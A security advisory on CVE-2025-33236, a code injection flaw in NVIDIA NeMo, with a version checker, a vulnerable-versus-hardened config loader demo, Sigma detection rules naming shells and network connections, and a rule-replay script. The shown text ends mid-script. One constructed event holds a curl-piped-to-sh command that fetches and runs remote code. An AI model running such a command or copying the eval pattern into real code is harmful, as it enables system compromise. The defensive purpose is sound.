RAXE-2026-024 HIGH CVSS 7.8 v3.1 S3

NVIDIA NeMo Framework Code Injection (CVE-2025-33236)

Supply Chain 2026-03-09 M. Hirani TLP:GREEN

Executive Summary

What: A high-severity code injection vulnerability (CVE-2025-33236, CVSS 7.8) exists in NVIDIA's NeMo Framework, an open-source platform for generative AI model training and deployment (NVD). Maliciously crafted data processed by NeMo versions prior to 2.6.1 can trigger arbitrary code execution, privilege escalation, information disclosure, and data tampering (NVD). The vulnerability was reported by Inga Cherny from Cato CTRL (NVIDIA Acknowledgements).

So What: CVE-2025-33236 is one of ten high-severity vulnerabilities disclosed simultaneously in the February 2026 NVIDIA NeMo security bulletin, comprising four code injection flaws (CWE-94), four deserialisation vulnerabilities (CWE-502), and two command injection flaws (CWE-77) (NVIDIA Advisory a_id/5762). This batch disclosure follows two prior NeMo security bulletins in November and December 2025 that addressed an additional four high-severity code injection and deserialisation flaws (NVIDIA Advisories a_id/5718, a_id/5736). The concentration of input validation and code evaluation weaknesses across multiple NeMo releases suggests a systemic pattern in the framework's data handling pathways (RAXE assessment based on CWE distribution across the three NVIDIA bulletins). The local attack vector (AV:L) with low-privilege requirement (PR:L) means that organisations operating shared ML training infrastructure -- where multiple users can submit training data or configuration files -- should assess their exposure to this vulnerability (NVD CVSS vector; risk characterisation is RAXE assessment).

Now What: Upgrade NVIDIA NeMo Framework to version 2.6.1 or later immediately. Version 2.6.1 was released on 9 January 2026 on PyPI (PyPI: nemo-toolkit). Audit all ML training pipelines that ingest external data through NeMo for potential exposure. Review the remaining nine CVEs in the same bulletin for additional risk in your environment (NVIDIA Advisory a_id/5762).


Risk Rating

Dimension       | Rating     | Detail
Severity        | HIGH (7.8) | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (NVD)
Urgency         | HIGH       | Patch available since January 2026 (PyPI: nemo-toolkit 2.6.1); batch of 10 CVEs increases attack surface
Scope           | UNCHANGED  | Impact confined to the vulnerable NeMo component (NVD)
Confidence      | HIGH       | CVE assigned, NVD analysed, GHSA published (GHSA-f86v-54pm-58q4), vendor advisory issued, patch released (NVD; NVIDIA Advisory a_id/5762)
Business Impact | HIGH       | Arbitrary code execution in ML training infrastructure (NVD: C:H/I:H/A:H); potential for model poisoning, data exfiltration, and training pipeline compromise (RAXE assessment based on NVD impact ratings)

Affected Products

Product      | Registry | Affected Versions           | Fixed Version               | Source
nemo-toolkit | PyPI     | All versions prior to 2.6.1 | 2.6.1 (released 2026-01-09) | NVIDIA Advisory a_id/5762; PyPI

Am I Affected?

  • Check if NVIDIA NeMo Framework is installed in any ML training, fine-tuning, or inference environment
  • Verify the installed version: pip show nemo-toolkit -- any version prior to 2.6.1 is within the vulnerable range (NVIDIA Advisory a_id/5762)
  • Review whether external or untrusted data (training datasets, model configurations, checkpoint files) is processed through NeMo pipelines
  • Assess whether low-privilege users can submit training jobs or data to shared NeMo installations
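The version check in the second bullet is easy to get wrong at scale: a lexical comparison puts 2.10.0 before 2.6.1, lock files pin the package under nemo_toolkit as well as nemo-toolkit, and pre-releases of 2.6.1 are still in the affected range. The following script is an added example for this advisory, not NVIDIA or NeMo code; it checks the running interpreter's installed package and scans pip-freeze or requirements text for vulnerable pins. The fixed version comes from NVIDIA Advisory a_id/5762; the SAMPLE_FREEZE text is constructed input.

```python
"""Version-range check for CVE-2025-33236 (nemo-toolkit < 2.6.1).

Added example for this advisory, not NVIDIA or NeMo code. The fixed
version is taken from NVIDIA Advisory a_id/5762; the requirements text
near the bottom is constructed sample input.
"""
import re
from importlib import metadata

PACKAGE = "nemo-toolkit"
FIXED_VERSION = "2.6.1"   # NVIDIA Advisory a_id/5762

# Subset of PEP 440 sufficient for PyPI releases: release segment, optional
# pre-release (a/b/rc), optional .postN, optional .devN, optional +local.
_VERSION_RE = re.compile(
    r"^v?(?P<release>\d+(?:\.\d+)*)"
    r"(?:(?P<pre_tag>a|b|rc)(?P<pre_num>\d+))?"
    r"(?:\.post(?P<post>\d+))?"
    r"(?:\.dev(?P<dev>\d+))?"
    r"(?:\+[0-9A-Za-z.]+)?$"
)


def parse_version(text):
    """Return a tuple that sorts like PEP 440 for the supported subset:
    X.devN < X.aN < X.bN < X.rcN < X < X.postN, compared numerically so
    that 2.10.0 > 2.6.1."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    release = [int(p) for p in m.group("release").split(".")]
    while len(release) > 1 and release[-1] == 0:   # 2.6.0 == 2.6
        release.pop()
    pre_rank = {"a": 0, "b": 1, "rc": 2}.get(m.group("pre_tag"), 3)
    if m.group("dev") is not None and m.group("pre_tag") is None:
        pre_rank = -1                              # X.devN precedes X.aN
    dev = m.group("dev")
    return (
        tuple(release),
        pre_rank,
        int(m.group("pre_num") or 0),
        0 if dev is not None else 1,               # .dev of a pre-release sorts first
        int(dev or 0),
        int(m.group("post") or 0),
    )


def is_vulnerable(version):
    """True when `version` is in the affected range (< 2.6.1). Pre-releases
    of 2.6.1 count as vulnerable, the conservative reading of the advisory."""
    return parse_version(version) < parse_version(FIXED_VERSION)


def installed_version(package=PACKAGE):
    """Version of `package` in the running interpreter, or None if absent.
    Run inside every venv or container image that trains with NeMo."""
    try:
        return metadata.version(package)
    except metadata.PackageNotFoundError:
        return None


def normalize_name(name):
    """PEP 503 name normalisation: nemo_toolkit, Nemo.Toolkit -> nemo-toolkit."""
    return re.sub(r"[-_.]+", "-", name).lower()


_PIN_RE = re.compile(
    r"^\s*(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)(?:\[[^\]]*\])?\s*==\s*(?P<ver>[^\s;#]+)"
)


def find_vulnerable_pins(requirements_text, package=PACKAGE):
    """Scan pip-freeze/requirements/constraints text for `==` pins of
    `package` in the vulnerable range. Returns [(line_number, version)];
    unparseable versions are reported as well, for manual review."""
    hits = []
    for lineno, line in enumerate(requirements_text.splitlines(), 1):
        m = _PIN_RE.match(line)
        if not m or normalize_name(m.group("name")) != package:
            continue
        ver = m.group("ver")
        try:
            if is_vulnerable(ver):
                hits.append((lineno, ver))
        except ValueError:
            hits.append((lineno, ver))
    return hits


# Constructed sample of a pip freeze from a training image (not a real lock file).
SAMPLE_FREEZE = """\
torch==2.5.1
nemo_toolkit[asr]==2.5.3    # extras and underscores still match the package
pytorch-lightning==2.4.0
"""

if __name__ == "__main__":
    live = installed_version()
    print("installed:", live, "vulnerable:", live is not None and is_vulnerable(live))
    print("vulnerable pins in SAMPLE_FREEZE:", find_vulnerable_pins(SAMPLE_FREEZE))
```

Point find_vulnerable_pins at every requirements.txt, constraints file and exported freeze in the estate's image build repositories; an SBOM or osquery's python_packages table gives the same answer for hosts already deployed.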

Abstract

CVE-2025-33236 is a high-severity code injection vulnerability (CWE-94) in the NVIDIA NeMo Framework, affecting all versions prior to 2.6.1 (NVD). The flaw allows a local attacker with low-level privileges to craft malicious data that, when processed by the framework, results in code injection leading to code execution (NVD). The CVSS vector (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) indicates that exploitation requires no user interaction and achieves high impact across confidentiality, integrity, and availability (NVD).

This vulnerability was disclosed as part of a batch of ten high-severity CVEs in the February 2026 NVIDIA NeMo security bulletin, which included four CWE-94 code injection flaws, four CWE-502 deserialisation flaws, and two CWE-77 command injection flaws (NVIDIA Advisory a_id/5762). NVIDIA credited Inga Cherny from Cato CTRL as the reporter (NVIDIA Acknowledgements). The fix was released in nemo-toolkit version 2.6.1, available on PyPI since 9 January 2026 (PyPI: nemo-toolkit).

The precise exploitation mechanism -- including the specific NeMo internal function, file format, and injection syntax -- has not been publicly detailed beyond the vendor advisory description. No public proof-of-concept exploit exists at time of writing. All analysis in this publication is derived from the NVD entry, NVIDIA advisory, and CWE-94 pattern inference.


Key Findings

  1. High-severity code injection in NVIDIA NeMo Framework -- CVE-2025-33236 (CWE-94, CVSS 7.8) enables arbitrary code execution within the NVIDIA NeMo Framework process when processing attacker-crafted data (NVD).

  2. Batch disclosure of ten high-severity CVEs -- The February 2026 NVIDIA security bulletin addresses ten vulnerabilities in the NeMo Framework, the largest batch to date. The highest-severity issue in the batch, CVE-2025-33245, carries a CVSS of 8.0 (NVIDIA Advisory a_id/5762).

  3. Systemic input validation weakness pattern -- The ten CVEs span three CWE categories: CWE-94 (code injection, 4 CVEs), CWE-502 (deserialisation of untrusted data, 4 CVEs), and CWE-77 (command injection, 2 CVEs). All share a common theme of insufficient validation of external data before processing (NVIDIA Advisory a_id/5762).

  4. Recurring NeMo security disclosures -- Prior NVIDIA NeMo security bulletins in November 2025 (2 CVEs, fixed in 2.5.0) and December 2025 (2 CVEs, fixed in 2.5.3) addressed similar code injection and deserialisation flaws, bringing the total to at least fourteen high-severity NeMo CVEs across three consecutive bulletins (NVIDIA Advisories a_id/5718, a_id/5736, a_id/5762).

  5. Local attack vector with insider threat relevance -- The CVSS vector specifies local access (AV:L) and low privileges (PR:L) (NVD). Shared ML training environments where multiple users submit training jobs or data to a common NeMo installation represent the most direct exposure scenario for this attack vector (RAXE assessment based on NVD CVSS vector).


Attack Flow

+--------------------------+
|  1. INITIAL ACCESS       |  Attacker has low-privilege local account
|  Low-privilege user      |  on system running NeMo Framework
|  (AV:L, PR:L)            |  (NVD)
+------------+-------------+
             |
             v
+--------------------------+
|  2. PAYLOAD CRAFTING     |  Attacker creates malicious data file
|  Malicious data file     |  (format and field not publicly known)
|  (CWE-94)                |  (NVIDIA Advisory a_id/5762)
+------------+-------------+
             |
             v
+--------------------------+
|  3. DATA DELIVERY        |  Malicious file placed in NeMo
|  Training pipeline       |  processing path (training data,
|  or config path          |  config, or checkpoint -- RAXE assessment)
+------------+-------------+
             |
             v
+--------------------------+
|  4. PROCESSING TRIGGER   |  NeMo Framework processes the
|  No user interaction     |  malicious data during training
|  required (UI:N)         |  or inference job (NVD)
+------------+-------------+
             |
             v
+--------------------------+
|  5. CODE INJECTION       |  Attacker-controlled code is
|  Arbitrary code runs     |  evaluated by the NeMo process
|  in NeMo process         |  (CWE-94 pattern)
+------------+-------------+
             |
             v
+--------------------------+
|  6. IMPACT               |  Code execution (C:H, I:H, A:H)
|  Privilege escalation    |  Information disclosure
|  Data tampering          |  Potential denial of service
|  Scope: Unchanged        |  (NVD)
+--------------------------+

Technical Details

Vulnerability Mechanics

The NVIDIA NeMo Framework contains a code injection flaw classified under CWE-94 (Improper Control of Generation of Code) (NVD). The NVD description states that "malicious data created by an attacker could cause code injection," potentially leading to "code execution, escalation of privileges, information disclosure, and data tampering" (NVD).

(RAXE assessment -- the following describes possible implementation patterns consistent with CWE-94. The specific vulnerable function, file format, and injection syntax for CVE-2025-33236 have not been publicly disclosed by NVIDIA.)

CWE-94 vulnerabilities in Python frameworks typically manifest through one or more of the following patterns (CWE-94 definition):

  • Dynamic code evaluation where user-controlled input reaches functions that interpret strings as runnable code (RAXE assessment)
  • Unsafe use of dynamic import machinery with attacker-controlled module paths (RAXE assessment)
  • Template injection where data fields are interpreted as runnable code rather than data (RAXE assessment)

The NVIDIA advisory states the vulnerability is triggered by "a specially crafted malicious file" (NVIDIA Advisory a_id/5762), suggesting a file-based input path -- likely a configuration file, dataset file, or model artefact processed during a NeMo training or inference job (RAXE assessment). The precise internal NeMo function, file format, and injection syntax have not been publicly disclosed.
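To make the first two CWE-94 patterns above concrete, the following is an added example for this advisory: a small config loader of the kind training frameworks commonly use, shown in a vulnerable form beside a hardened one. It does not reproduce the NeMo code path behind CVE-2025-33236, which NVIDIA has not published. The loader, the field names `_target_`, `args`, `kwargs` and `init`, the DataConfig class and all three sample configs are constructed for illustration.

```python
"""The CWE-94 pattern in a Python config loader: vulnerable next to hardened.

Added example for this advisory. It does not reproduce the NeMo code path
behind CVE-2025-33236, which NVIDIA has not published; it shows the generic
pattern the CWE-94 class describes (a dotted path from the file is imported
and called, a string from the file is eval'd). The loader, the field names
_target_/args/kwargs/init, the DataConfig class and the sample configs are
all constructed for illustration.
"""
import ast
import importlib
import json
import os


# --- vulnerable: the file decides what is imported and what is evaluated ---

def resolve_dotted_path(path):
    """Import 'pkg.mod.attr' and return attr. No restriction on pkg."""
    module_name, _, attr = path.rpartition(".")
    return getattr(importlib.import_module(module_name), attr)


def instantiate_vulnerable(cfg):
    target = resolve_dotted_path(cfg["_target_"])      # attacker picks the callable
    kwargs = dict(cfg.get("kwargs", {}))
    for key, expr in cfg.get("init", {}).items():
        kwargs[key] = eval(expr)                         # CWE-94: data run as code
    return target(*cfg.get("args", []), **kwargs)


# --- hardened: closed allow-list of targets, literal values only ---

class DataConfig:
    """Stand-in for a component that a config file is allowed to build."""
    def __init__(self, path, batch_size=8):
        self.path = path
        self.batch_size = batch_size


ALLOWED_TARGETS = {"data_config": DataConfig}   # maintainer-chosen names, not paths


def instantiate_hardened(cfg):
    target = ALLOWED_TARGETS.get(cfg.get("_target_"))
    if target is None:
        raise ValueError(f"target not allowed: {cfg.get('_target_')!r}")
    kwargs = dict(cfg.get("kwargs", {}))
    for key, expr in cfg.get("init", {}).items():
        # literal_eval accepts numbers, strings and containers only; names,
        # attribute access and calls raise ValueError.
        kwargs[key] = ast.literal_eval(expr)
    return target(*cfg.get("args", []), **kwargs)


def load_config(text):
    """JSON, so parsing itself cannot execute code (pickle, or yaml.load without
    SafeLoader, would be the CWE-502 sibling of this bug)."""
    return json.loads(text)


# Constructed attacker-controlled files. Nothing here is NeMo syntax.
MALICIOUS_CONFIG = json.dumps({
    "_target_": "builtins.eval",
    "args": ["__import__('os').getpid()"],
})
MALICIOUS_INIT_CONFIG = json.dumps({
    "_target_": "data_config",
    "kwargs": {"path": "/data/train.jsonl"},
    "init": {"batch_size": "__import__('os').getpid()"},
})
BENIGN_CONFIG = json.dumps({
    "_target_": "data_config",
    "kwargs": {"path": "/data/train.jsonl"},
    "init": {"batch_size": "16"},
})


def demo():
    """Run both loaders over the sample configs and report what happened."""
    out = {}
    # Vulnerable loader: the attacker's expression executes in this process.
    out["vulnerable_executed"] = instantiate_vulnerable(load_config(MALICIOUS_CONFIG)) == os.getpid()
    # Hardened loader: unknown target is rejected before anything is imported.
    try:
        instantiate_hardened(load_config(MALICIOUS_CONFIG))
        out["hardened_rejected_target"] = False
    except ValueError:
        out["hardened_rejected_target"] = True
    # Hardened loader: allowed target, but a non-literal init expression is rejected.
    try:
        instantiate_hardened(load_config(MALICIOUS_INIT_CONFIG))
        out["hardened_rejected_expr"] = False
    except ValueError:
        out["hardened_rejected_expr"] = True
    out["benign_batch_size"] = instantiate_hardened(load_config(BENIGN_CONFIG)).batch_size
    return out


if __name__ == "__main__":
    print(demo())
```

The hardened loader changes the trust boundary rather than filtering strings: the file can only select among names the maintainer registered, and values are parsed as literals, so there is no denylist of dangerous substrings to bypass. The same review question applies to any NeMo-adjacent loader you audit: does any string from a dataset, config or checkpoint reach import_module, eval, exec or a template engine?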

CVSS Vector Analysis

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H -- Base Score 7.8 HIGH (NVD)

Metric              | Value           | Implication
Attack Vector       | Local (AV:L)    | Attacker must have local system access or deliver a file processed locally (NVD)
Attack Complexity   | Low (AC:L)      | No special conditions or preparation required beyond crafting the malicious data (NVD)
Privileges Required | Low (PR:L)      | A standard low-privilege account is sufficient; root or admin access is not required (NVD)
User Interaction    | None (UI:N)     | Exploitation requires no victim action once the malicious data is in the processing path (NVD)
Scope               | Unchanged (S:U) | Impact is confined to the vulnerable NeMo component (NVD)
Confidentiality     | High (C:H)      | Complete information disclosure from the vulnerable process (NVD)
Integrity           | High (I:H)      | Data tampering and unauthorised code modification (NVD)
Availability        | High (A:H)      | Potential denial of service or resource exhaustion (NVD)

The exploitability sub-score is 1.8 and the impact sub-score is 5.9 (NVD). The EPSS score at time of advisory publication was 0.017% (4th percentile), indicating low observed exploitation probability at that time (FIRST.org EPSS).

Weakness Classification

CWE-94: Improper Control of Generation of Code (Code Injection) (NVD). This weakness class encompasses scenarios where software constructs code segments using externally influenced input but does not neutralise or incorrectly neutralises special elements that could modify the syntax or behaviour of the intended code segment (CWE-94 definition).

Batch Disclosure Context

The February 2026 NVIDIA security bulletin (a_id/5762) addresses ten CVEs simultaneously. The full set is listed below for situational awareness:

CVE ID         | CVSS | CWE     | Description
CVE-2025-33245 | 8.0  | CWE-502 | Malicious data causes remote code execution (NVIDIA Advisory a_id/5762)
CVE-2025-33236 | 7.8  | CWE-94  | Code injection from attacker-crafted malicious data (NVD)
CVE-2025-33241 | 7.8  | CWE-502 | RCE via maliciously crafted file loading (NVIDIA Advisory a_id/5762)
CVE-2025-33243 | 7.8  | CWE-502 | RCE in distributed environments (NVIDIA Advisory a_id/5762)
CVE-2025-33246 | 7.8  | CWE-77  | Command injection in ASR Evaluator utility (NVIDIA Advisory a_id/5762)
CVE-2025-33249 | 7.8  | CWE-77  | Command injection in voice-preprocessing script (NVIDIA Advisory a_id/5762)
CVE-2025-33250 | 7.8  | CWE-94  | Remote code execution (NVIDIA Advisory a_id/5762)
CVE-2025-33251 | 7.8  | CWE-94  | Remote code execution (NVIDIA Advisory a_id/5762)
CVE-2025-33252 | 7.8  | CWE-502 | Remote code execution (NVIDIA Advisory a_id/5762)
CVE-2025-33253 | 7.8  | CWE-502 | RCE via maliciously crafted file (NVIDIA Advisory a_id/5762)

All ten CVEs are fixed in NeMo Framework version 2.6.1 (NVIDIA Advisory a_id/5762).

Prior NeMo Security Bulletins

Bulletin  | Date          | CVE Count | CWE Types                        | Fixed In | Source
a_id/5718 | November 2025 | 2         | CWE-94 x2                        | 2.5.0    | NVIDIA Advisory a_id/5718
a_id/5736 | December 2025 | 2         | CWE-502 x2                       | 2.5.3    | NVIDIA Advisory a_id/5736
a_id/5762 | February 2026 | 10        | CWE-94 x4, CWE-502 x4, CWE-77 x2 | 2.6.1    | NVIDIA Advisory a_id/5762

The escalating CVE count across consecutive bulletins (2, 2, 10) may reflect increased security research attention on the NeMo Framework rather than deteriorating code quality. However, the persistence of the same weakness categories (CWE-94 and CWE-502) across all three bulletins suggests that earlier fixes addressed individual instances rather than the underlying input validation architecture (RAXE assessment).


Confidence & Validation

Assessment Confidence: High

Aspect            | Status    | Detail
Vendor Advisory   | Confirmed | NVIDIA Advisory a_id/5762 published, patch released (NVIDIA Advisory a_id/5762)
CVE Assigned      | Yes       | CVE-2025-33236, published 2026-02-18, analysed by NVD (NVD)
GHSA Published    | Yes       | GHSA-f86v-54pm-58q4, severity HIGH, status unreviewed (GHSA-f86v-54pm-58q4)
Reporter Credit   | Confirmed | Inga Cherny, Cato CTRL (NVIDIA Acknowledgements)
PoC Available     | No        | No public proof-of-concept exists; RAXE PoC is conceptual only (RAXE assessment)
Patch Available   | Yes       | nemo-toolkit 2.6.1 on PyPI since 2026-01-09 (PyPI: nemo-toolkit)
Exploited in Wild | Not known | No reports of active exploitation; not listed on CISA KEV at time of writing (NVD)

Detection Signatures (Formal Rules)

Advisory Limitations Notice

The NVIDIA security advisory and NVD entry provide minimal technical detail about the specific exploitation mechanism -- no vulnerable function, file format, or injection syntax has been publicly disclosed. As a result, all detection rules below are necessarily generic: they target observable system-level behaviours consistent with CWE-94 exploitation rather than signature-matching a known exploit payload. These rules will produce false positives in environments with legitimate NeMo subprocess activity and will require significant tuning. They should be treated as starting points, not production-ready signatures. Rules will require revision once a public exploit or detailed technical analysis becomes available.

Sigma Rule 1 -- Unexpected Child Process Spawned by NeMo Process

Detects shell or interpreter child processes of a NeMo Python process, consistent with CWE-94 post-exploitation behaviour (NVD; CWE-94 definition).

title: Unexpected Shell or Interpreter Child of NVIDIA NeMo Process
id: a1b2c3d4-0001-4000-8000-raxe2026024a
status: experimental
description: >
  Detects a shell interpreter or scripting engine spawned as a direct child of a
  NVIDIA NeMo Framework Python process. This pattern is consistent with CWE-94
  (Code Injection) exploitation of CVE-2025-33236, where attacker-controlled data
  causes arbitrary code execution within the NeMo process.
  Rule is advisory-derived; the specific injection vector is not publicly known.
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-33236
  - https://nvidia.custhelp.com/app/answers/detail/a_id/5762
tags:
  - attack.t1059
  - cve.2025-33236
  - cwe.94
author: RAXE Labs (M. Hirani)
date: 2026-03-09
logsource:
  category: process_creation
  product: linux
detection:
  selection_parent:
    ParentImage|contains:
      - '/python'
      - '/python3'
  selection_parent_cmdline:
    ParentCommandLine|contains:
      - 'nemo'
      - 'nemo_toolkit'
      - 'nemo-toolkit'
  selection_child:
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/dash'
      - '/zsh'
      - '/ksh'
      - '/python'
      - '/python3'
      - '/perl'
      - '/ruby'
      - '/node'
  condition: selection_parent and selection_parent_cmdline and selection_child
falsepositives:
  - Legitimate NeMo data preprocessing scripts that use subprocess calls
  - Distributed training launchers (torchrun, mpirun) invoked via NeMo entry points
  - Container environment setup scripts co-located with NeMo processes
  - CI/CD pipelines running NeMo training with orchestration wrappers
level: high

Sigma Rule 2 -- Unexpected Network Connection from NeMo Process

Detects outbound network connections from NeMo processes to non-standard ports, consistent with post-exploitation data exfiltration or reverse shell establishment (NVD).

title: Unexpected Outbound Network Connection from NVIDIA NeMo Process
id: a1b2c3d4-0002-4000-8000-raxe2026024b
status: experimental
description: >
  Detects an outbound TCP network connection initiated by a NVIDIA NeMo Framework
  Python process to a port outside the expected set of model registries and training
  coordination ports. This behaviour is consistent with post-exploitation activity
  following CVE-2025-33236 (CWE-94 Code Injection).
  Rule is advisory-derived; no public exploit details confirm this pattern.
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-33236
  - https://nvidia.custhelp.com/app/answers/detail/a_id/5762
tags:
  - attack.t1071
  - cve.2025-33236
  - cwe.94
author: RAXE Labs (M. Hirani)
date: 2026-03-09
logsource:
  category: network_connection
  product: linux
detection:
  selection_process:
    Image|contains:
      - '/python'
      - '/python3'
    # CommandLine is not part of the standard Sigma network_connection field set;
    # on backends whose network telemetry lacks it, drop this clause and rely on Image.
    CommandLine|contains:
      - 'nemo'
      - 'nemo_toolkit'
      - 'nemo-toolkit'
    # Outbound only, as the description states; without this, inbound accepts on
    # training rendezvous sockets would also match.
    Initiated: 'true'
  filter_legitimate_ports:
    DestinationPort:
      - 443
      - 80
      - 8080
      - 29500
      - 29501
  condition: selection_process and not filter_legitimate_ports
falsepositives:
  - NeMo pipelines that connect to custom data stores or internal APIs on non-standard ports
  - Distributed training setups using custom MASTER_PORT values
  - Monitoring or profiling agents that open additional ports during training runs
level: medium

Sigma Rule 3 -- Suspicious File Written to NeMo Working Directories

Detects unexpected file creation in NeMo working directories, consistent with persistence following code injection (NVIDIA Advisory a_id/5762).

title: Unexpected Script Written to NVIDIA NeMo Working Directory
id: a1b2c3d4-0003-4000-8000-raxe2026024c
status: experimental
description: >
  Detects creation of scripts or binaries in directories commonly used by the
  NVIDIA NeMo Framework. The NVIDIA advisory for CVE-2025-33236 states exploitation
  requires a specially crafted malicious file; a file drop following successful code
  injection is consistent with persistence or lateral movement activity.
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-33236
  - https://nvidia.custhelp.com/app/answers/detail/a_id/5762
tags:
  - attack.t1105
  - cve.2025-33236
  - cwe.94
author: RAXE Labs (M. Hirani)
date: 2026-03-09
logsource:
  category: file_event
  product: linux
detection:
  selection_directory:
    TargetFilename|contains:
      - '/nemo_experiments/'
      - '/nemo_checkpoints/'
      - '/.cache/huggingface/'
      - '/nemo_datasets/'
      - '/workspace/nemo'
      - '/home/nemo'
      - '/opt/nemo'
  selection_extension:
    TargetFilename|endswith:
      - '.sh'
      - '.py'
      - '.pl'
      - '.rb'
      - '.elf'
      - '.so'
      # '.bin' deliberately omitted: Hugging Face weight files (pytorch_model.bin)
      # land under /.cache/huggingface/ on every model download and would fire constantly.
  filter_known_nemo_writes:
    TargetFilename|endswith:
      - '.nemo'
      - '.ckpt'
      - '.pt'
      - '.log'
      - '.json'
      - '.yaml'
      - '.txt'
  condition: selection_directory and selection_extension and not filter_known_nemo_writes
falsepositives:
  - Environment setup scripts legitimately placed in NeMo working directories by administrators
  - Custom NeMo plugins or extensions that install Python files to checkpoint directories
  - Automated pipeline scripts that stage preprocessing code alongside NeMo checkpoints
level: medium

Sigma Rule 4 -- Vulnerable nemo-toolkit Version Detected

Process-creation rule that flags version queries for nemo-toolkit. It does not itself establish the installed version; correlate with the command output or with a package inventory (osquery python_packages table, an SBOM) to confirm whether a host runs a release prior to 2.6.1 (NVIDIA Advisory a_id/5762).

title: Vulnerable NVIDIA NeMo Toolkit Version Detected (CVE-2025-33236)
id: a1b2c3d4-0004-4000-8000-raxe2026024d
status: experimental
description: >
  Detects invocation of a pip version query for nemo-toolkit. The process_creation
  event alone does not reveal the installed version; correlate with the command output
  or, preferably, with a package inventory (osquery python_packages table or an SBOM)
  to confirm whether the installed version is prior to 2.6.1, the full vulnerable
  range for CVE-2025-33236 (CVSS 7.8 HIGH, CWE-94 Code Injection).
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-33236
  - https://nvidia.custhelp.com/app/answers/detail/a_id/5762
tags:
  - attack.t1195
  - cve.2025-33236
  - cwe.94
  - posture
author: RAXE Labs (M. Hirani)
date: 2026-03-09
logsource:
  category: process_creation
  product: linux
detection:
  selection_pip_show:
    CommandLine|contains|all:
      - 'pip'
      - 'show'
      - 'nemo-toolkit'
  condition: selection_pip_show
falsepositives:
  - Security scanning tools legitimately auditing installed packages
  - Administrator-initiated version checks as part of patch verification
level: informational

Sigma Rule 5 -- Dynamic Code Evaluation in NeMo Process Context

Detects Python dynamic evaluation constructs co-located with NeMo module references on the command line, consistent with CWE-94 exploitation (NVD; CWE-94 definition).

title: Suspicious Dynamic Code Evaluation in NVIDIA NeMo Process Context
id: a1b2c3d4-0005-4000-8000-raxe2026024e
status: experimental
description: >
  Detects Python process invocations that combine NVIDIA NeMo module references with
  dynamic code evaluation constructs on the command line. This pattern is consistent
  with CWE-94 (Code Injection) exploitation as classified for CVE-2025-33236.
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-33236
  - https://nvidia.custhelp.com/app/answers/detail/a_id/5762
  - https://cwe.mitre.org/data/definitions/94.html
tags:
  - attack.t1059.006
  - cve.2025-33236
  - cwe.94
author: RAXE Labs (M. Hirani)
date: 2026-03-09
logsource:
  category: process_creation
  product: linux
detection:
  selection_python:
    Image|contains:
      - '/python'
      - '/python3'
  selection_nemo_context:
    CommandLine|contains:
      - 'nemo'
      - 'nemo_toolkit'
  selection_dynamic_evaluation:
    CommandLine|contains:
      - '__import__('
      - 'compile('
      - 'importlib'
  condition: selection_python and selection_nemo_context and selection_dynamic_evaluation
falsepositives:
  - Development or notebook environments where analysts pass dynamic patterns as inline test code
  - Automated testing frameworks invoking NeMo with dynamic test harness code
  - Specific NeMo plugin implementations that legitimately use dynamic imports
level: high
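Before deploying Rules 1 and 2, it is worth replaying their logic over telemetry you control to see both the intended hit and the false positive the falsepositives sections warn about (a torchrun-launched worker is a python child of a python parent with "nemo" on its command line). The script below is an added example for this advisory, not a Sigma backend and not part of the rules; its matchers mirror the selections above with Sigma's case-insensitive contains/endswith semantics, and the outbound matcher additionally requires Initiated to be true. Every event is constructed, not captured from a real NeMo host, and the addresses are RFC 5737 documentation ranges.

```python
"""Rule 1 and Rule 2 logic replayed over constructed Linux telemetry.

Added example for this advisory; not a Sigma backend and not part of the
rules. Matchers mirror the selections in Rules 1 and 2 (case-insensitive
contains/endswith, as Sigma defines them). All events are constructed.
"""

NEMO_MARKERS = ("nemo", "nemo_toolkit", "nemo-toolkit")
PYTHON_IMAGES = ("/python", "/python3")
CHILD_INTERPRETERS = ("/bash", "/sh", "/dash", "/zsh", "/ksh",
                      "/python", "/python3", "/perl", "/ruby", "/node")
EXPECTED_PORTS = {443, 80, 8080, 29500, 29501}


def _contains_any(value, needles):
    value = (value or "").lower()
    return any(n in value for n in needles)


def _endswith_any(value, needles):
    value = (value or "").lower()
    return any(value.endswith(n) for n in needles)


def rule1_child_process(ev):
    """Sigma Rule 1: shell or interpreter spawned by a NeMo python process."""
    return (_contains_any(ev.get("ParentImage"), PYTHON_IMAGES)
            and _contains_any(ev.get("ParentCommandLine"), NEMO_MARKERS)
            and _endswith_any(ev.get("Image"), CHILD_INTERPRETERS))


def rule2_outbound(ev):
    """Sigma Rule 2: outbound connection from a NeMo python process to a port
    outside the expected set. Initiated must be true so that inbound accepts
    on rendezvous sockets do not match."""
    return (_contains_any(ev.get("Image"), PYTHON_IMAGES)
            and _contains_any(ev.get("CommandLine"), NEMO_MARKERS)
            and str(ev.get("Initiated", "")).lower() == "true"
            and int(ev.get("DestinationPort", 0)) not in EXPECTED_PORTS)


# Constructed process_creation events.
PROCESS_EVENTS = [
    # p1: training job spawns sh that pulls a script -> true positive
    {"id": "p1", "ParentImage": "/usr/bin/python3",
     "ParentCommandLine": "python3 -m nemo.collections.llm.train --config run.yaml",
     "Image": "/bin/sh", "CommandLine": "sh -c 'curl http://203.0.113.5/s | sh'"},
    # p2: torchrun worker, python child of python with nemo on the parent
    #     command line -> fires; this is the documented false positive
    {"id": "p2", "ParentImage": "/usr/bin/python3",
     "ParentCommandLine": "python3 /usr/local/bin/torchrun --nproc_per_node 8 nemo_train.py",
     "Image": "/usr/bin/python3", "CommandLine": "python3 -u nemo_train.py"},
    # p3: unrelated python script spawning bash -> no NeMo marker, no alert
    {"id": "p3", "ParentImage": "/usr/bin/python3",
     "ParentCommandLine": "python3 backup.py",
     "Image": "/bin/bash", "CommandLine": "bash -c 'tar czf /backup/etc.tgz /etc'"},
]
# Constructed network_connection events.
NETWORK_EVENTS = [
    # n1: connection to 4444 from the training process -> true positive
    {"id": "n1", "Image": "/usr/bin/python3",
     "CommandLine": "python3 -m nemo.collections.llm.train",
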